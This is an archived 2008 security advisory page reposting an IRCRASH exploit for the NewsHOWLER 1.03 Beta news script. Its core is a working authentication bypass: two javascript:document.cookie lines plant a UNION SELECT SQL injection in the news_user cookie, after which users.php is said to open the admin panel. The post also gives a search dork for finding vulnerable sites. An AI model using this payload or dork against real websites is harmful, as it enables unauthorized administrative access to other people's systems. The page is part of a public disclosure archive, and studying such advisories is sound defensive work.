Computer Security

Security Advisory: NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

  PHP Live Helper <= 2.0.1 Multiple Vulnerabilities

  munky-bliki lfi

  Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:18.08.2008
Subject:NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#################################################################################
####
####           NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection            ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#################################################################################
####
#                                                                                  
 #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                  
 #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                  
 #
#################################################################################
####
#                                   [Exploit]                                       #
#                                                                                  
 #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
#javascript:document.cookie = "news_password=3; path=/";                            #
#                                                                                  
 #
#Then if u open http://Site/users.php u can see the admin panel ;)                  #
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Πειςθνγ@Mail.ru